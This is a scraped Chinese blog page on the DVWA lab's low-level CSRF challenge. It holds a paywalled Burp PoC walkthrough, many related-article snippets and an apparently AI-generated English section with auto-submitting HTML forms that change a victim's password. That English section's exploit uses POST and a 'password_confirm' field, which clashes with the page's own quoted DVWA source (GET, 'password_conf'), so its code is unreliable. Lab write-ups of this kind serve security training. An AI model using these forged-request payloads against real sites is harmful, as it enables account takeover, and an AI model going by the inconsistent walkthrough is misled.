DVWA 靶场CSRF(low)

原创 已于 2022-08-15 12:11:12 修改 · 1.6k 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#csrf #安全 #web安全

于 2022-08-15 12:05:55 首次发布
本文通过DVWA的CSRF(low)靶场,演示了CSRF攻击如何修改用户密码,解释了CSRF攻击的原理,以及提出了三种防御措施:二次验证机制、检查HTTP Referer和使用Token验证。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

csrf界面,点Test credentials,输入默认的账号密码,点击登录,提示密码有效。(admin,password)

修改密码界面输入新的密码两次,burp抓包,选择CSRF Poc会生成一段payload。

复制html代码,另存为一个html文件。将这个html文件的两个密码 都改成123456,并在浏览器打开,点submit。

</

最低0.47元/天 解锁文章

200万优质内容无限畅学
DVWACSRF攻击(Low&medium&High)
liweibin812的博客
01-14 5473
CSRF,全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。在20...
DVWA 靶场CSRF通关
m0_65761158的博客
07-10 827
添加了一个generateSessionToken()函数,用户每次访问修改密码时服务器会返回一个随机的token,向服务器发起请求时,需要提交token参数,而服务器在收到请求时,会优先检查token,只有token正确,才会处理客户端的请求。服务器收到修改密码的请求后,会检查参数password_new与password_conf是否相同,如果相同,就会修改密码。修改密码abc123之后就会在地址栏出现相应的链接可以发现是get型所以提交的参数会所以显示,并提示密码修改成功。可以看到密码已修改成功。
DVWA靶场第三 CSRFlow级)
weixin_61178511的博客
01-29 2647
CSRF的中文叫:”跨站请求攻击“,它是通过仿照某一个特殊的网页(重置密码)来进行诱惑性攻击。 首先,更改难度为low级,打开浏览器代理,打开Burp Suite进行抓包,输入要修改的密码。呈现如下页。 可以看到进行构造的poc,然后点击行动->相工具->CSRF Poc 生成进行攻击poc 点击用浏览器测试,出现如上框,进行复制,再打开页进入如下网页 点击Submit request完成攻击,然后直接放包即可 登录查看旧密码已失效。即更改成功 ...
DVWA_CSRF_low
qq_45434762的博客
10-17 324
1.CSRF简介 CSRF(Cross Site Request Forgery:跨站请求伪造),攻击者盗用合法的用户身份,以合法用户的名义去发出恶意请求,但这对服务器来说确识完全合法的,通过CSRF可以完成密码重置,管理员账户添加,转账等高位操作。 2.DVWA_CSRF_low延时 ①在输入框内输入password ②使用BP拦截,并构造CSRF POC ③构造出的HTML...
DVWA靶场通关CSRF
m0_56010012的博客
04-05 3595
CSRF(Cross-site request forgery),翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。 CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。而最常见的就是QQ空间的登陆。 CSRF属于业务逻辑漏洞,服务器信任经过身份认证的用户。 XSS属于技术漏洞,客
dvwa- CSRFlow
Nothing-one的博客
05-24 166
标题第三个模块 和以前一样进行php源码的观看。 这个其实也就是观察password_new和password_conf是否相等。 伪造一个链接然后在浏览器里进行访问。在dvwa的这个界中的网址的后加上?password_new=password&password_conf=password&Change=Change# 修改后的密码就是password。 ...
DVWA靶场CSRF漏洞通关教程及源码审计
m0_74786138的博客
01-13 765
通过POST请求传送JSON格式的数据,也支持传统的表单提交。代码首先检查请求是否合法,并提取用户令牌、新密码和确认密码。然后验证密码是否匹配,如果匹配,则对新密码进行安全处理(转义和加密),并更新数据库中的数据。这一多了token,只要保证与浏览器的token对上即可。没有任何过滤措施,很危险,并且采用了不安全的。第4行设置了请求来源防止跨站伪造请求。打开burp缺少referer头。设置了多种验证,是很安全的方式。复制在另一个网页打开。
网络安全最全DVWACSRF高级_dvwa csrf 高级
2401_84302369的博客
05-04 426
,然后从相应中取得Token(通过正则表达式提取)取得后在将Token和新密发一起发送给页完成密码修改(4)先构造一个Javascript原生代码发送AJAX请求的代码将上述代码放置在攻击服务器上想办法将上述JS代码嵌入到被攻击者服务器上即可完成。(High级别无法实现)在high级别中,屏蔽了处理方式:先切换到Low级,在留言本里注入以下脚本,然后在切换到High级,直接触发改密。
DVWA靶场通关----(三)CSRF
最新发布
m0_74977101的博客
02-04 903
攻击者诱骗用户浏览器向目标网站发送一个“伪造的请求”(如转账、修改密码),利用用户已登录的会话权限完成恶意操作。
DVWA——CSRF(low)
分享简单的安全技术
01-04 360
CSRF 源代码 <?php if( isset( $_GET[ 'Change' ] ) ) { // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf' ]; // Do the passwords match? if( $pass_new == $pass_conf ) { // They do!
Dvwa csrflow、medium、high级别漏洞实战
永不垂头的博客
08-11 6190
Dvwa csrf低中高级别漏洞实战 Low 源代码如下: GLOBALS:引用全局作用域中可用的全部变量。GLOBALS :引用全局作用域中可用的全部变量。GLOBALS:引用全局作用域中可用的全部变量。GLOBALS 这种全局变量用于在 PHP 脚本中的任意位置访问全局变量(从函数或方法中均可)。PHP 在名为 $GLOBALS[index] 的数组中存储了所有全局变量。变量的名字就是数组的键。 从源代码可以看出这里只是对用户输入的两个密码进行判断,看是否相等。不相等就提示密码不匹配。 相等的话,查看
DVWA漏洞平台学习之LOW级别
李熠专用博客_白帽子一枚,人称低危终结者
09-13 1558
在上一篇文章中,我们搭建DVWA平台,本文开始,我将依次带你学习如何在DVWA平台上利用这些漏洞。 首先将DVWA级别设置为LOW。 接下来,我们开始对每个漏洞进行复现。 0x00 Brute Force-暴力破解 漏洞利用 进入Brute Force页, 要求输入用户名和密码,进行登录,在LOW级别下,没有做任何的防护,我们可以用BurpSuite进行暴力破解。(于BurpSuit的使用,你可以自行百度或者注本公众号后续的文章) 漏洞分析 0x01 Command Injection-命令注入
DVWA靶场搭建
s1doer的博客
09-23 800
1、搭建环境: DVWA下载地址: https://github.com/digininja/DVWA/archive/master.zip phpStudy2016下载地址: https://www.xp.cn/ 虚拟机:win10 2、启动phpStudy,保证MySQL和Apache能够正常运行 3、将解压之后的DVWA-master文件夹名字改为DVWA并拷贝至phpstudy/WWW/目录下 4、找到DVWA/config/目录下config.inc.php.dist文件复制一份重命名为co
DVWA - CSRF (low, medium, high)
无节操
01-06 3643
low设置一下cookie的PHPSESSID和security即可跨站请求import requestsdef main(): url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php' headers = { 'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngk
DVWA靶场通关
..
01-24 3725
Brute Force low等级: 先随便输一下账号密码,在bp抓包发送到intruder模块,先点击清除§。 然后选中下admin和password的值,点击添加§,表明这是要爆破的点。 选择爆破模式集束炸弹(Clusterbomb),对于这几种模式的区别,可以看一下这篇博客。 burpsuite中intruder模块爆破的四种模式_liweibin812的博客-优快云博客_burp intruder 模式 转到有效载荷(payload)这个界,加.
DVWA靶机-XSS与CSRF、文件上传的攻击原理、分类、对比以及漏洞演示(low、Medium、Hign、Impossible)
天下著书立传者,皆为我师
03-16 2973
DVWA靶机--讲解XSS与CSRF、文件上传的攻击原理、分类、对比以及漏洞演示(low、Medium、Hign、Impossible)
DVWA】13. CSRFLow+Medium)
Zichel77的博客
12-19 1083
应该对用户输入进行适当的验证和过滤,如检查密码长度、使用安全的密码哈希算法等。代码检查了保留变量HTTP_REFERER (http包头部的Referer字段的值,表示来源地址)是否包含SERVER_NAME(http包头部的 Host 字段表示要访问的主机名)。未防止 SQL 注入: 代码中直接将用户输入的密码插入到 SQL 查询语句中,存在 SQL 注入的风险。未防止 SQL 注入: 代码中直接将用户输入的密码插入到 SQL 查询语句中,存在 SQL 注入的风险。
DVWA教程(一) —— Low级别
weixin_47610939的博客
04-29 2529
本篇文章为各位正在学习DVWA提供解题思路,同时也是本人的学习笔记,本文中的方法仅为验证漏洞,并无攻击目的。DVWA安装,可以使用docker容器,非常简单方便,通过以下链接: Docker Hubhttps://hub.docker.com/r/sagikazarmark/dvwa 0x01. 暴力破解 0x02. 代码注入 先看题目,是一个ping命令 <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get in...
CSRF漏洞DVWA靶场LOW级别的例子演示
2301_77185537的博客
12-22 732
输入被更改后的密码123456(原密码是password)输入原密码无效,输入新密码验证成功,证明crsf修改了用户密码,使用新密码登录成功,一个简单的CSRF漏洞演示完毕。:复制这段HTML代码,把他单独保存下来,再将这个html文件的两个密码都改成123456,并在浏览器里打开。漏洞DVWA靶场LOW级别的例子演示(记住我的admin用户已经被改成123456了):接着我们在修改密码界输入新的密码,在使用burpsuite进行数据包抓取。:显示密码有效,可以进行下一的操作。
dvwa靶场csrf
12-29
### DVWA CSRF Vulnerability Walkthrough and Explanation #### Understanding CSRF in DVWA Cross-Site Request Forgery (CSRF) is a type of attack that tricks the victim into submitting a malicious request. It forces an end user to execute unwanted actions on a web application in which they are authenticated[^1]. In DVWA, this vulnerability can be explored at different difficulty levels including Low, Medium, High, and Impossible. For the **Low level**, no token or any form of validation exists. An attacker could craft a simple HTML page with hidden fields mimicking the target's POST data structure: ```html <form action="http://192.168.112.188/dvwa/vulnerabilities/csrf/" method="POST"> <input type="hidden" name="password_new" value="hacked"/> <input type="hidden" name="password_confirm" value="hacked"/> <input type="submit" value="Change Password"/> </form> <script>document.forms[0].submit();</script> ``` At the **Medium level**, although there might not be strict anti-CSRF tokens implemented, other defenses such as checking HTTP referer headers may apply. However, these checks often prove insufficient against sophisticated attacks because attackers can manipulate browser behavior through various means like embedding images pointing to internal URLs within external pages[^2]. In more advanced scenarios—like those found under 'High' settings—the presence of unique per-session tokens makes exploitation significantly harder but still possible via techniques involving session fixation or exploiting XSS flaws elsewhere on the site. The ultimate goal when configuring security measures should always aim towards achieving what DVWA terms "Impossible". Here, comprehensive protections prevent successful forgery attempts by ensuring each legitimate operation includes unpredictable values tied directly back to individual sessions. #### Demonstrating Exploitation Process To demonstrate how one exploits CSRF vulnerabilities present in lower difficulties using DVWA: - Create an HTML file named `change_password.html` containing crafted forms targeting password change functionality. ```html <!-- Example for low-level CSRF --> <!DOCTYPE html> <html lang="en"> <head><title>Exploit Page</title></head> <body onload='document.getElementById("csrf").submit()'> <form id="csrf" action="http://target-ip-address/dvwa/vulnerabilities/csrf/" method="POST"> <input type="text" name="password_new" value="newpass"/> <input type="text" name="password_confirm" value="newpass"/> <input type="submit" name="Change" /> </form> </body> </html> ``` Upon loading this exploit page while logged into DVWA, it automatically submits the form changing your account’s credentials without explicit consent from you. #### Mitigation Strategies Against CSRF Attacks Implementing robust countermeasures involves several best practices: - Utilizing synchronized cookie patterns where requests must include both cookies and matching parameters sent along with them. - Generating cryptographically secure random numbers used once per transaction known as synchronizer tokens stored server-side during login then validated upon submission. - Employing double submit cookies strategy wherein clients send two copies of their session identifier – one inside standard Cookie header another explicitly included among submitted variables. --related questions-- 1. What specific mechanisms does DVWA implement across its varying CSRF challenge complexities? 2. How do modern frameworks address potential CSRF threats beyond traditional methods discussed here? 3. Can machine learning algorithms enhance detection rates for novel types of cross-site scripting attacks related to CSRF? 4. Are there real-world examples demonstrating effective bypasses around contemporary anti-CSRF implementations?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值